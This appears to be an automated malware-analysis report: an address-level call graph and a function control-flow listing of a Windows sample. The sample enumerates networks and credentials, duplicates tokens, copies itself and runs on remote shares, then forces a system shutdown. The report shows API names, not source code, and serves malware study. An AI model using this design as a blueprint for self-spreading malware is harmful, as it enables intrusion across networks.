GetProcessHeap HeapAlloc 7129->7134 7131 2e52dc7 7131->7072 7131->7073 7132->7083 7133->7078 7134->7131 7136 2e52e38 7135->7136 7140 2e52e3e 7136->7140 7143 2e51000 GetProcessHeap HeapAlloc 7136->7143 7138 2e52e61 7139 2e52ed7 memcpy 7138->7139 7138->7140 7139->7140 7140->7102 7140->7103 7141->7113 7142->7108 7143->7138 7144->6594 7145->6597 7175 2e51000 GetProcessHeap HeapAlloc 7146->7175 7148 2e53111 7149 2e53118 7148->7149 7150 2e52466 3 API calls 7148->7150 7151 2e53192 7149->7151 7177 2e51000 GetProcessHeap HeapAlloc 7149->7177 7152 2e5313e 7150->7152 7151->6615 7151->6616 7153 2e53145 7152->7153 7176 2e51000 GetProcessHeap HeapAlloc 7152->7176 7157 2e520d0 2 API calls 7153->7157 7155 2e531a6 7158 2e531af 7155->7158 7159 2e531b9 7155->7159 7157->7149 7161 2e520d0 2 API calls 7158->7161 7164 2e5688f 3 API calls 7159->7164 7160 2e53155 7162 2e53168 7160->7162 7163 2e5315b 7160->7163 7161->7151 7166 2e520d0 2 API calls 7162->7166 7167 2e520d0 2 API calls 7163->7167 7165 2e531cb 7164->7165 7168 2e531db 7165->7168 7170 2e5243f 5 API calls 7165->7170 7169 2e53183 7166->7169 7167->7153 7172 2e520d0 2 API calls 7168->7172 7171 2e520d0 2 API calls 7169->7171 7170->7168 7171->7149 7173 2e531ea 7172->7173 7174 2e520d0 2 API calls 7173->7174 7174->7151 7175->7148 7176->7160 7177->7155 7178->6625 7180 2e53999 7179->7180 7181 2e5399e 7180->7181 7221 2e51000 GetProcessHeap HeapAlloc 7180->7221 7184 2e52466 3 API calls 7181->7184 7196 2e53a04 7181->7196 7183 2e539af 7183->7181 7185 2e539e4 memcpy 7183->7185 7186 2e53a30 7184->7186 7185->7181 7206 2e53a39 7186->7206 7222 2e51000 GetProcessHeap HeapAlloc 7186->7222 7187 2e53a94 7187->6646 7188 2e53b3d 7192 2e5688f 3 API calls 7188->7192 7189 2e53aa8 7223 2e51000 GetProcessHeap HeapAlloc 7189->7223 7213 2e53af3 7192->7213 7193 2e520d0 2 API calls 7193->7196 7194 2e53ab2 7197 2e53ac5 7194->7197 7198 2e53abb 7194->7198 7195 2e53a4c 7199 2e53a60 memcpy 7195->7199 7200 2e53a53 7195->7200 7196->7187 7196->7188 7196->7189 7204 2e5688f 3 API calls 7197->7204 7202 2e520d0 2 API calls 7198->7202 7205 2e520d0 2 API calls 7199->7205 7203 2e520d0 2 API calls 7200->7203 7201 2e520d0 2 API calls 7201->7187 7202->7187 7203->7206 7207 2e53ad7 7204->7207 7208 2e53a82 7205->7208 7206->7193 7209 2e53aeb 7207->7209 7211 2e5243f 5 API calls 7207->7211 7210 2e520d0 2 API calls 7208->7210 7212 2e520d0 2 API calls 7209->7212 7210->7196 7214 2e53ae7 7211->7214 7212->7213 7213->7201 7214->7209 7215 2e53b02 7214->7215 7224 2e51000 GetProcessHeap HeapAlloc 7215->7224 7217 2e53b0f 7218 2e53b30 7217->7218 7219 2e53b18 memcpy 7217->7219 7220 2e520d0 2 API calls 7218->7220 7219->7218 7220->7213 7221->7183 7222->7195 7223->7194 7224->7217 7225->6664 7226->6661 7227->6668 7236 2e51000 GetProcessHeap HeapAlloc 7228->7236 7230 2e5483e 7230->6689 7235 2e51000 GetProcessHeap HeapAlloc 7230->7235 7231 2e54837 7231->7230 7232 2e53986 16 API calls 7231->7232 7233 2e5488a 7232->7233 7234 2e520d0 2 API calls 7233->7234 7234->7230 7235->6683 7236->7231 7237->6693 7240 2e54b15 7238->7240 7239 2e54b5d 7239->6696 7240->7239 7242 2e54820 16 API calls 7240->7242 7243 2e54b59 7240->7243 7241 2e53986 16 API calls 7241->7239 7242->7243 7243->7239 7243->7241 7245 2e54c40 7244->7245 7312 2e51000 GetProcessHeap HeapAlloc 7245->7312 7247 2e54c59 7248 2e54afe 16 API calls 7247->7248 7290 2e54c60 7247->7290 7249 2e54cb7 7248->7249 7250 2e520d0 2 API calls 7249->7250 7251 2e54cc2 7250->7251 7252 2e54da2 7251->7252 7251->7290 7313 2e51000 GetProcessHeap HeapAlloc 7251->7313 7252->7290 7315 2e51000 GetProcessHeap HeapAlloc 7252->7315 7255 2e54db3 7256 2e54afe 16 API calls 7255->7256 7255->7290 7258 2e54def 7256->7258 7257 2e54ce6 7259 2e54afe 16 API calls 7257->7259 7257->7290 7260 2e520d0 2 API calls 7258->7260 7261 2e54d3c 7259->7261 7262 2e54dfa 7260->7262 7263 2e520d0 2 API calls 7261->7263 7265 2e54e94 7262->7265 7262->7290 7316 2e51000 GetProcessHeap HeapAlloc 7262->7316 7264 2e54d47 7263->7264 7264->7290 7314 2e51000 GetProcessHeap HeapAlloc 7264->7314 7266 2e54ee9 7265->7266 7265->7290 7317 2e51000 GetProcessHeap HeapAlloc 7265->7317 7266->7290 7318 2e51000 GetProcessHeap HeapAlloc 7266->7318 7271 2e54e1a 7275 2e54afe 16 API calls 7271->7275 7271->7290 7272 2e54f0b 7276 2e53986 16 API calls 7272->7276 7272->7290 7273 2e54d63 7277 2e54afe 16 API calls 7273->7277 7273->7290 7274 2e54eae 7278 2e54afe 16 API calls 7274->7278 7274->7290 7279 2e54e4d 7275->7279 7282 2e54f43 7276->7282 7283 2e54d97 7277->7283 7284 2e54edf 7278->7284 7280 2e54e52 7279->7280 7281 2e54e5f 7279->7281 7285 2e520d0 2 API calls 7280->7285 7286 2e54afe 16 API calls 7281->7286 7287 2e520d0 2 API calls 7282->7287 7288 2e520d0 2 API calls 7283->7288 7289 2e520d0 2 API calls 7284->7289 7285->7290 7291 2e54e89 7286->7291 7293 2e54f4d 7287->7293 7288->7252 7289->7266 7290->6702 7292 2e520d0 2 API calls 7291->7292 7292->7265 7293->7290 7319 2e51000 GetProcessHeap HeapAlloc 7293->7319 7295 2e54f7e 7296 2e54f87 7295->7296 7297 2e54f99 memcpy 7295->7297 7298 2e520d0 2 API calls 7296->7298 7297->7296 7298->7290 7320 2e51000 GetProcessHeap HeapAlloc 7299->7320 7301 2e520d0 2 API calls 7303 2e55106 7301->7303 7302 2e54c1c 17 API calls 7306 2e550fd 7302->7306 7303->6709 7303->6710 7304 2e551e6 7305 2e520d0 2 API calls 7304->7305 7307 2e551d9 7305->7307 7306->7302 7306->7303 7306->7304 7306->7307 7308 2e55189 memcpy 7306->7308 7310 2e551c8 7306->7310 7307->7301 7309 2e520d0 2 API calls 7308->7309 7309->7306 7311 2e520d0 2 API calls 7310->7311 7311->7303 7312->7247 7313->7257 7314->7273 7315->7255 7316->7271 7317->7274 7318->7272 7319->7295 7320->7306 7321->6716 7322->6726 7323->6741 7324->6724 7325->6739 7326->6742 7327->6743 7328->6763 7329->6773 7330->6785 7331->6787 7332->6795 7334 2e524dd 7333->7334 7335 2e524d9 7333->7335 7340 2e51000 GetProcessHeap HeapAlloc 7334->7340 7335->6798 7335->6799 7337 2e524ee 7337->7335 7338 2e524f4 memcpy 7337->7338 7338->7335 7339->6808 7340->7337 7342 2e5680e 7341->7342 7346 2e5245d 7341->7346 7343 2e56812 recv 7342->7343 7342->7346 7344 2e5682b htons 7343->7344 7343->7346 7345 2e56853 7344->7345 7344->7346 7345->7346 7347 2e56855 recv 7345->7347 7346->6423 7347->7345 7347->7346 7348->6828 7350 2e53483 7349->7350 7351 2e53488 7349->7351 7354 2e534e1 7350->7354 7356 2e52466 3 API calls 7350->7356 7387 2e51000 GetProcessHeap HeapAlloc 7351->7387 7353 2e53496 7353->7350 7355 2e5349c memcpy 7353->7355 7358 2e53575 7354->7358 7359 2e53585 7354->7359 7360 2e535e8 7354->7360 7355->7350 7357 2e53510 7356->7357 7361 2e53519 7357->7361 7388 2e51000 GetProcessHeap HeapAlloc 7357->7388 7358->6833 7389 2e51000 GetProcessHeap HeapAlloc 7359->7389 7364 2e5688f 3 API calls 7360->7364 7365 2e520d0 2 API calls 7361->7365 7368 2e535cc 7364->7368 7365->7354 7366 2e5358b 7369 2e53594 7366->7369 7370 2e5359e 7366->7370 7367 2e5352c 7371 2e53540 memcpy 7367->7371 7372 2e53533 7367->7372 7373 2e520d0 2 API calls 7368->7373 7374 2e520d0 2 API calls 7369->7374 7376 2e5688f 3 API calls 7370->7376 7377 2e520d0 2 API calls 7371->7377 7375 2e520d0 2 API calls 7372->7375 7373->7358 7374->7358 7375->7361 7378 2e535b0 7376->7378 7379 2e53563 7377->7379 7380 2e535c4 7378->7380 7382 2e5243f 5 API calls 7378->7382 7381 2e520d0 2 API calls 7379->7381 7383 2e520d0 2 API calls 7380->7383 7381->7354 7384 2e535c0 7382->7384 7383->7368 7384->7380 7385 2e535db 7384->7385 7386 2e520d0 2 API calls 7385->7386 7386->7368 7387->7353 7388->7367 7389->7366 7411 2e51000 GetProcessHeap HeapAlloc 7390->7411 7392 2e5262d 7399 2e526c1 7392->7399 7412 2e51000 GetProcessHeap HeapAlloc 7392->7412 7394 2e52659 7395 2e526b9 7394->7395 7396 2e52466 3 API calls 7394->7396 7397 2e520d0 2 API calls 7395->7397 7398 2e526a8 7396->7398 7397->7399 7400 2e526b1 7398->7400 7401 2e526ca 7398->7401 7399->6852 7410 2e51000 GetProcessHeap HeapAlloc 7399->7410 7402 2e520d0 2 API calls 7400->7402 7413 2e51000 GetProcessHeap HeapAlloc 7401->7413 7402->7395 7404 2e526d3 7405 2e520d0 2 API calls 7404->7405 7406 2e526e1 7405->7406 7407 2e520d0 2 API calls 7406->7407 7408 2e526e9 7407->7408 7409 2e520d0 2 API calls 7408->7409 7409->7399 7410->6847 7411->7392 7412->7394 7413->7404 7414->6861 7415->6879 7416->6891 7417->6886 7418->6911 7419->6918 7421 2e56fc7 14 API calls 7420->7421 7422 2e57c30 7421->7422 7423 2e56fc7 14 API calls 7422->7423 7424 2e57c3b GetComputerNameExW 7423->7424 7425 2e57c65 CreateThread 7424->7425 7426 2e57c59 7424->7426 7430 2e57c79 7425->7430 7514 2e58e7f 7425->7514 7427 2e56fc7 14 API calls 7426->7427 7427->7425 7431 2e57c98 Sleep 7430->7431 7487 2e5777b LoadLibraryW 7430->7487 7497 2e5786b GetIpNetTable 7430->7497 7507 2e5795a NetServerEnum 7430->7507 7431->7430 7435 2e5a125 GetProcessHeap HeapAlloc 7434->7435 7436 2e5a11e 7434->7436 7438 2e5a153 GetProcessHeap HeapAlloc 7435->7438 7439 2e5a26b 7435->7439 7437 2e59f8e 130 API calls 7436->7437 7437->7435 7438->7439 7440 2e5a16c 7438->7440 7581 2e56f40 7440->7581 7442 2e5a1a1 CreateThread 7443 2e5a263 7442->7443 7446 2e5a175 7442->7446 7588 2e5a073 7442->7588 7587 2e56f78 GetProcessHeap HeapFree 7443->7587 7445 2e5a1d9 WaitForMultipleObjects 7445->7443 7445->7446 7446->7439 7446->7442 7446->7445 7450 2e5a18a 7446->7450 7447 2e5a219 CloseHandle 7448 2e5a22b GetProcessHeap HeapAlloc 7447->7448 7448->7443 7449 2e5a23a GetProcessHeap HeapAlloc 7448->7449 7449->7443 7449->7450 7450->7443 7450->7446 7450->7447 7450->7448 7584 2e56f02 7450->7584 7453 2e56f40 7 API calls 7452->7453 7456 2e5a299 7453->7456 7454 2e5a2cf GetProcessHeap HeapFree 7456->7454 7457 2e56f91 5 API calls 7456->7457 7458 2e56f02 3 API calls 7456->7458 7459 2e5a2c9 7456->7459 7718 2e59dc3 7456->7718 7457->7456 7458->7456 7724 2e56f78 GetProcessHeap HeapFree 7459->7724 7462 2e59fcf 7461->7462 7463 2e59fb8 DuplicateTokenEx 7461->7463 7464 2e57091 13 API calls 7462->7464 7463->7462 7465 2e59fe9 7464->7465 7725 2e57a17 WNetOpenEnumW 7465->7725 7470 2e570fa 3 API calls 7471 2e59ffd 7470->7471 7472 2e56f40 7 API calls 7471->7472 7481 2e5a008 7472->7481 7473 2e5a04d 7474 2e5a060 7473->7474 7475 2e5a058 CloseHandle 7473->7475 7477 2e5a065 CloseHandle 7474->7477 7478 2e5a06a 7474->7478 7475->7474 7476 2e59987 78 API calls 7476->7481 7477->7478 7479 2e56f91 StrCmpIW EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 7479->7481 7480 2e56f02 3 API calls 7480->7481 7481->7473 7481->7476 7481->7479 7481->7480 7482 2e5a047 7481->7482 7743 2e56f78 GetProcessHeap HeapFree 7482->7743 7744 2e58bc6 GetCurrentThread OpenThreadToken 7484->7744 7488 2e57864 7487->7488 7489 2e5779a GetProcAddress 7487->7489 7488->7430 7490 2e57853 GetLastError 7489->7490 7491 2e577b2 GetProcessHeap RtlAllocateHeap 7489->7491 7492 2e57859 FreeLibrary 7490->7492 7491->7492 7494 2e577d7 7491->7494 7492->7488 7493 2e57841 GetProcessHeap RtlFreeHeap 7493->7492 7494->7493 7495 2e577ff wsprintfW 7494->7495 7496 2e56fc7 14 API calls 7495->7496 7496->7494 7498 2e57897 7497->7498 7500 2e57890 7497->7500 7499 2e578a0 GetProcessHeap HeapAlloc 7498->7499 7498->7500 7499->7500 7501 2e578bf GetIpNetTable 7499->7501 7500->7430 7502 2e57941 GetProcessHeap HeapFree 7501->7502 7503 2e578cb 7501->7503 7502->7500 7503->7502 7504 2e578fb wsprintfW 7503->7504 7506 2e5793d 7503->7506 7505 2e56fc7 14 API calls 7504->7505 7505->7503 7506->7502 7511 2e57995 7507->7511 7508 2e5799c 7509 2e57a0e 7508->7509 7510 2e57a05 NetApiBufferFree 7508->7510 7509->7431 7510->7509 7511->7508 7511->7509 7512 2e5795a 14 API calls 7511->7512 7513 2e56fc7 14 API calls 7511->7513 7512->7511 7513->7511 7515 2e5a4f0 7514->7515 7516 2e58e8f memset memset GetAdaptersInfo 7515->7516 7517 2e5907f 7516->7517 7518 2e58eeb LocalAlloc 7516->7518 7518->7517 7519 2e58f05 GetAdaptersInfo 7518->7519 7520 2e59075 LocalFree 7519->7520 7534 2e58f15 7519->7534 7520->7517 7521 2e58f23 inet_addr inet_addr 7539 2e56916 MultiByteToWideChar 7521->7539 7522 2e58fc8 7543 2e58243 NetServerGetInfo 7522->7543 7527 2e5905e 7527->7520 7532 2e59064 CloseHandle 7527->7532 7528 2e56fc7 14 API calls 7530 2e58f70 GetProcessHeap HeapFree 7528->7530 7529 2e58fe5 LocalAlloc 7533 2e58ff5 inet_addr 7529->7533 7535 2e58fd9 7529->7535 7530->7534 7531 2e56916 4 API calls 7531->7534 7532->7520 7532->7532 7533->7535 7534->7521 7534->7522 7534->7528 7534->7531 7537 2e56fc7 14 API calls 7534->7537 7535->7527 7535->7529 7536 2e59020 htonl htonl CreateThread 7535->7536 7536->7535 7572 2e58e04 7536->7572 7538 2e58fa8 GetProcessHeap HeapFree 7537->7538 7538->7534 7540 2e5693e GetProcessHeap HeapAlloc 7539->7540 7542 2e5696a 7539->7542 7541 2e56956 MultiByteToWideChar 7540->7541 7540->7542 7541->7542 7542->7534 7544 2e58261 7543->7544 7545 2e58276 NetApiBufferFree 7544->7545 7546 2e5827d 7544->7546 7545->7546 7546->7535 7547 2e5908a GetComputerNameExW DhcpEnumSubnets 7546->7547 7548 2e591f1 7547->7548 7557 2e59101 7547->7557 7548->7535 7549 2e59111 DhcpGetSubnetInfo 7549->7557 7550 2e591e8 DhcpRpcFreeMemory 7550->7548 7551 2e59139 DhcpEnumSubnetClients 7551->7557 7552 2e591cf DhcpRpcFreeMemory 7552->7557 7553 2e5917f htonl 7560 2e5a3d9 7553->7560 7555 2e59193 htonl inet_ntoa 7556 2e56916 4 API calls 7555->7556 7556->7557 7557->7549 7557->7550 7557->7551 7557->7552 7557->7553 7557->7555 7558 2e56fc7 14 API calls 7557->7558 7559 2e591b4 GetProcessHeap HeapFree 7558->7559 7559->7557 7565 2e5a2e8 memset socket 7560->7565 7563 2e5a2e8 8 API calls 7564 2e5a3fd 7563->7564 7564->7557 7566 2e5a345 htons ioctlsocket 7565->7566 7567 2e5a3cf 7565->7567 7568 2e5a374 connect select 7566->7568 7569 2e5a3c8 closesocket 7566->7569 7567->7563 7567->7564 7568->7569 7570 2e5a3b3 __WSAFDIsSet 7568->7570 7569->7567 7570->7569 7571 2e5a3c5 7570->7571 7571->7569 7573 2e58e6f LocalFree 7572->7573 7578 2e58e1e 7572->7578 7574 2e58e24 htonl 7575 2e5a3d9 8 API calls 7574->7575 7575->7578 7576 2e58e31 htonl inet_ntoa 7577 2e56916 4 API calls 7576->7577 7577->7578 7578->7573 7578->7574 7578->7576 7579 2e56fc7 14 API calls 7578->7579 7580 2e58e51 GetProcessHeap HeapFree 7579->7580 7580->7578 7582 2e5711f 7 API calls 7581->7582 7583 2e56f56 7582->7583 7583->7446 7585 2e57167 3 API calls 7584->7585 7586 2e56f13 7585->7586 7586->7450 7587->7439 7589 2e5a0f7 7588->7589 7590 2e5a07f 7588->7590 7591 2e5a0a6 7590->7591 7645 2e59e05 7590->7645 7593 2e5a0ae 7591->7593 7594 2e5a0b9 7591->7594 7597 2e5a0c9 7591->7597 7652 2e59ec7 7593->7652 7596 2e5a0d9 GetProcessHeap HeapFree GetProcessHeap HeapFree 7594->7596 7601 2e59987 7594->7601 7596->7589 7597->7596 7665 2e56f91 7597->7665 7602 2e59997 7601->7602 7603 2e599b1 wsprintfW 7602->7603 7605 2e59d97 SetLastError 7602->7605 7669 2e58b70 7603->7669 7605->7597 7608 2e59a2f WNetAddConnection2W wsprintfW PathFindExtensionW 7609 2e59a81 PathFileExistsW 7608->7609 7623 2e59aa2 7608->7623 7611 2e59b17 7609->7611 7612 2e59a98 GetLastError 7609->7612 7610 2e58946 3 API calls 7610->7623 7613 2e59d7c 7611->7613 7612->7623 7613->7605 7616 2e59d83 WNetCancelConnection2W 7613->7616 7614 2e59b24 7617 2e59b43 GetCurrentThread OpenThreadToken 7614->7617 7618 2e59b2e 7614->7618 7615 2e59ac3 GetLastError 7615->7613 7615->7623 7616->7605 7619 2e59b65 DuplicateTokenEx 7617->7619 7638 2e59b7e 7617->7638 7672 2e56ce7 7618->7672 7619->7638 7621 2e59b8c memset 7630 2e59bd5 7621->7630 7621->7638 7622 2e59d58 7626 2e59d6c 7622->7626 7627 2e59d5e CloseHandle 7622->7627 7623->7605 7623->7610 7623->7613 7623->7614 7623->7615 7625 2e59b00 WNetCancelConnection2W 7623->7625 7625->7608 7626->7613 7629 2e59d72 CloseHandle 7626->7629 7627->7626 7629->7613 7631 2e59d4a DeleteFileW 7630->7631 7630->7638 7685 2e597a5 7630->7685 7696 2e598ab 7630->7696 7631->7622 7632 2e59d2b GetLastError 7632->7638 7633 2e59d44 7633->7622 7633->7631 7635 2e59c6c CreateProcessAsUserW 7635->7638 7636 2e59c78 CreateProcessW 7636->7638 7637 2e59c86 WaitForSingleObject GetExitCodeProcess 7637->7638 7639 2e59cb1 CloseHandle 7637->7639 7638->7621 7638->7622 7638->7630 7638->7631 7638->7632 7638->7633 7638->7635 7638->7636 7638->7637 7640 2e59cbd CloseHandle 7638->7640 7641 2e59cc9 CloseHandle 7638->7641 7642 2e59cd5 CloseHandle 7638->7642 7643 2e59ce1 CloseHandle 7638->7643 7644 2e59d17 PathFileExistsW 7638->7644 7639->7638 7640->7638 7641->7638 7642->7638 7643->7638 7644->7638 7646 2e5711f 7 API calls 7645->7646 7651 2e59e29 7646->7651 7647 2e59e97 7647->7591 7648 2e59987 78 API calls 7648->7651 7649 2e59e88 GetProcessHeap HeapFree 7649->7647 7650 2e57167 3 API calls 7650->7651 7651->7647 7651->7648 7651->7649 7651->7650 7653 2e5711f 7 API calls 7652->7653 7664 2e59ee4 7653->7664 7654 2e59f85 7654->7594 7654->7597 7655 2e59ef3 CreateThread 7656 2e59f26 SetThreadToken 7655->7656 7655->7664 7715 2e59ea4 7655->7715 7658 2e59f35 ResumeThread 7656->7658 7659 2e59f56 CloseHandle 7656->7659 7657 2e59f7d 7714 2e56f78 GetProcessHeap HeapFree 7657->7714 7662 2e59f50 GetLastError 7658->7662 7663 2e59f43 WaitForSingleObject 7658->7663 7659->7664 7660 2e57167 3 API calls 7660->7664 7662->7659 7663->7659 7664->7654 7664->7655 7664->7657 7664->7660 7666 2e56fa3 7665->7666 7666->7666 7667 2e5724d 5 API calls 7666->7667 7668 2e56fc2 7667->7668 7668->7596 7670 2e58b8a wsprintfW 7669->7670 7671 2e58b7b PathFindFileNameW 7669->7671 7670->7608 7671->7670 7673 2e56cff 7672->7673 7673->7673 7674 2e56d0a GetProcessHeap HeapAlloc 7673->7674 7675 2e56dd7 7674->7675 7676 2e56d33 memcpy 7674->7676 7675->7617 7678 2e56d61 7676->7678 7678->7678 7679 2e56d6c GetProcessHeap HeapAlloc 7678->7679 7680 2e56dcc GetProcessHeap HeapFree 7679->7680 7681 2e56d8a memcpy 7679->7681 7680->7675 7707 2e5724d 7681->7707 7686 2e597b2 7685->7686 7687 2e58b70 PathFindFileNameW 7686->7687 7694 2e597cf SetLastError 7687->7694 7689 2e5982b PathFileExistsW 7690 2e5989a 7689->7690 7691 2e59836 wsprintfW wsprintfW 7689->7691 7690->7630 7692 2e56bb0 18 API calls 7691->7692 7693 2e5986d memcpy 7692->7693 7693->7690 7694->7689 7694->7690 7697 2e598b8 7696->7697 7698 2e58b70 PathFindFileNameW 7697->7698 7699 2e598d2 GetSystemDirectoryW 7698->7699 7700 2e598e6 PathAppendW PathFileExistsW 7699->7700 7701 2e59971 GetLastError 7699->7701 7702 2e598fd wsprintfW wsprintfW 7700->7702 7703 2e59977 7700->7703 7701->7703 7704 2e56bb0 18 API calls 7702->7704 7703->7630 7705 2e5993a wsprintfW 7704->7705 7705->7703 7708 2e56dc0 GetProcessHeap HeapFree 7707->7708 7709 2e5725b EnterCriticalSection 7707->7709 7708->7680 7710 2e5726b 7709->7710 7711 2e571d6 3 API calls 7710->7711 7712 2e57279 LeaveCriticalSection 7711->7712 7712->7708 7714->7654 7716 2e59987 78 API calls 7715->7716 7717 2e59ebe 7716->7717 7719 2e59dd0 7718->7719 7720 2e56bb0 18 API calls 7719->7720 7721 2e59de8 7720->7721 7722 2e59dfc 7721->7722 7723 2e596c7 89 API calls 7721->7723 7722->7456 7723->7722 7724->7454 7726 2e57b28 7725->7726 7727 2e57a4a GlobalAlloc 7725->7727 7735 2e57b31 CredEnumerateW 7726->7735 7728 2e57b27 7727->7728 7733 2e57a63 7727->7733 7728->7726 7729 2e57a66 memset WNetEnumResourceW 7730 2e57b0d GlobalFree WNetCloseEnum 7729->7730 7729->7733 7730->7728 7732 2e57a17 14 API calls 7732->7733 7733->7729 7733->7732 7734 2e56fc7 14 API calls 7733->7734 7734->7733 7736 2e57c08 7735->7736 7737 2e57b5b 7735->7737 7736->7470 7738 2e57bff CredFree 7737->7738 7739 2e56fc7 14 API calls 7737->7739 7740 2e57bfd 7737->7740 7741 2e57bbd 7737->7741 7738->7736 7739->7737 7740->7738 7741->7737 7742 2e56de0 24 API calls 7741->7742 7742->7741 7743->7473 7745 2e58bf5 GetTokenInformation 7744->7745 7746 2e58cb3 GetLastError 7744->7746 7747 2e58c13 GetLastError 7745->7747 7748 2e58ca8 CloseHandle 7745->7748 7749 2e57d60 7746->7749 7750 2e58c25 GlobalAlloc 7747->7750 7753 2e58ca6 7747->7753 7748->7749 7751 2e58ca4 GetLastError 7750->7751 7752 2e58c37 GetTokenInformation 7750->7752 7751->7753 7754 2e58c99 GetLastError 7752->7754 7757 2e58c4a 7752->7757 7753->7748 7755 2e58c9b GlobalFree 7754->7755 7755->7753 7756 2e58c59 GetSidSubAuthorityCount 7756->7757 7757->7755 7757->7756 7758 2e58c6a GetSidSubAuthority 7757->7758 7759 2e58c97 7757->7759 7758->7757 7759->7755 7760 2e5b765 7762 2e5b76f 7760->7762 7761 2e5bc5b 3 API calls 7763 2e5ac62 7761->7763 7762->7761 7762->7763 7803 2e5adcb 7805 2e5addf 7803->7805 7804 2e5aea2 7806 2e5bc5b 3 API calls 7804->7806 7808 2e5ac62 7804->7808 7805->7804 7807 2e5ae74 memcpy 7805->7807 7806->7808 7807->7804 7776 2e56caa 7777 2e56cb5 7776->7777 7778 2e56ce0 7776->7778 7779 2e56cd1 7777->7779 7780 2e56cc9 GetProcessHeap HeapFree 7777->7780 7779->7778 7781 2e56cd8 GetProcessHeap HeapFree 7779->7781 7780->7779 7781->7778 7782 2e56c74 StrCmpIW 7783 2e56ca0 7782->7783 7784 2e56c90 StrCmpW 7782->7784 7784->7783 7785 2e5aa74 7789 2e5a64e 7785->7789 7786 2e5b8df 7787 2e5bc5b 3 API calls 7786->7787 7788 2e5ac60 7786->7788 7787->7788 7789->7786 7789->7788 7790 2e5aa1f memcpy 7789->7790 7790->7789 7791 2e51f74 7792 2e51f93 7791->7792 7793 2e51fc1 GetProcessHeap HeapAlloc memcpy 7792->7793 7794 2e51fba 7792->7794 7793->7794 7795 2e51feb memcpy 7793->7795 7795->7794 7796 2e52003 memcpy 7795->7796 7796->7794 7797 2e5201f memcpy 7796->7797 7797->7794 7798 2e5203f memcpy 7797->7798 7798->7794 7799 2e5c236 free 7800 2e57d39 7801 2e57d51 7800->7801 7802 2e57d42 DisableThreadLibraryCalls 7800->7802 7802->7801 7819 2e51019 7820 2e51034 7819->7820 7821 2e51022 GetProcessHeap HeapFree 7819->7821 7821->7820

                                                Executed Functions

                                                Function 02E57DEB Relevance: 65.0, APIs: 33, Strings: 4, Instructions: 295threadmemorysleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 2e57deb-2e57e04 call 2e5a4f0 call 2e57cc0 5 2e57e14-2e57e78 WSAStartup call 2e57091 * 2 InitializeCriticalSection call 2e56a2b 0->5 6 2e57e06-2e57e0f call 2e59590 0->6 14 2e57e84-2e57ea2 call 2e584df CreateThread 5->14 15 2e57e7a-2e57e7f call 2e5835e call 2e58d5a 5->15 6->5 21 2e57ea4-2e57eab 14->21 22 2e57eb2-2e57ec4 call 2e570fa 14->22 15->14 21->22 24 2e57ead call 2e57545 21->24 27 2e57ed4-2e57edb 22->27 28 2e57ec6-2e57ecf call 2e58999 22->28 24->22 30 2e57ff1-2e58041 call 2e570fa CreateThread call 2e58282 GetProcessHeap HeapAlloc 27->30 31 2e57ee1-2e57f06 call 2e57091 call 2e5875a 27->31 28->27 40 2e58043-2e5805c CreateThread 30->40 41 2e5806b-2e58084 Sleep 30->41 31->30 42 2e57f0c-2e57f12 31->42 40->41 43 2e5805e-2e58065 GetProcessHeap HeapFree 40->43 44 2e58086 call 2e51eef 41->44 45 2e5808b-2e5809e Sleep 41->45 46 2e57f15-2e57f32 CreateThread 42->46 43->41 44->45 48 2e580a0-2e580cb memset GetVersionExW 45->48 49 2e5811b-2e58161 Sleep wsprintfW call 2e583bd 45->49 50 2e57f34-2e57f43 SetThreadToken 46->50 51 2e57f69 46->51 48->49 54 2e580cd-2e580da 48->54 66 2e58114-2e58115 ExitProcess 49->66 67 2e58163-2e58170 GetModuleHandleA 49->67 55 2e57f55-2e57f5b GetLastError 50->55 56 2e57f45-2e57f51 ResumeThread 50->56 52 2e57f70-2e57f96 SetLastError CreateThread 51->52 59 2e57fd3-2e57fd6 52->59 60 2e57f98-2e57fa7 SetThreadToken 52->60 62 2e580e6-2e580ed 54->62 63 2e580dc-2e580df 54->63 58 2e57f5e-2e57f67 CloseHandle 55->58 56->52 57 2e57f53 56->57 57->58 58->52 68 2e57fe5-2e57feb 59->68 69 2e57fd8-2e57fe0 call 2e57298 59->69 64 2e57fa9-2e57fb5 ResumeThread 60->64 65 2e57fca-2e57fcd CloseHandle 60->65 62->49 72 2e580ef-2e580f1 62->72 70 2e580e1-2e580e4 63->70 71 2e580f8-2e58112 call 2e56bb0 call 2e57d6f 63->71 74 2e57fc4 GetLastError 64->74 75 2e57fb7-2e57fc2 WaitForSingleObject 64->75 65->59 76 2e58192-2e581a6 InitiateSystemShutdownExW 67->76 77 2e58172-2e58180 GetProcAddress 67->77 68->30 68->46 69->68 70->62 70->71 71->49 71->66 72->71 79 2e580f3-2e580f6 72->79 74->65 75->65 76->66 82 2e581ac-2e581b5 ExitWindowsEx 76->82 77->76 81 2e58182-2e58190 NtRaiseHardError 77->81 79->49 79->71 81->76 82->66
                                                APIs
                                                  • Part of subcall function 02E57CC0: GetTickCount.KERNEL32 ref: 02E57CCB
                                                  • Part of subcall function 02E57CC0: GetModuleFileNameW.KERNEL32(C:\Windows\dllcm.dat,0000030C,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,02E57E00), ref: 02E57D27
                                                  • Part of subcall function 02E57CC0: CreateFileW.KERNEL32(C:\Windows\dllcm.dat,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02E58AEC
                                                  • Part of subcall function 02E57CC0: GetFileSize.KERNEL32(00000000,00000000), ref: 02E58AFD
                                                  • Part of subcall function 02E57CC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02E58B0C
                                                  • Part of subcall function 02E57CC0: HeapAlloc.KERNEL32(00000000), ref: 02E58B13
                                                  • Part of subcall function 02E57CC0: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 02E58B2C
                                                  • Part of subcall function 02E57CC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02E58B3D
                                                  • Part of subcall function 02E57CC0: HeapFree.KERNEL32(00000000), ref: 02E58B44
                                                  • Part of subcall function 02E57CC0: CloseHandle.KERNEL32(?), ref: 02E58B63
                                                • WSAStartup.WS2_32(00000202,02E6F768), ref: 02E57E1E
                                                • InitializeCriticalSection.KERNEL32(02E6F124,00000008,02E56C74,02E56CAA,000000FF,00000024,02E56EDA,00000000,0000FFFF), ref: 02E57E63
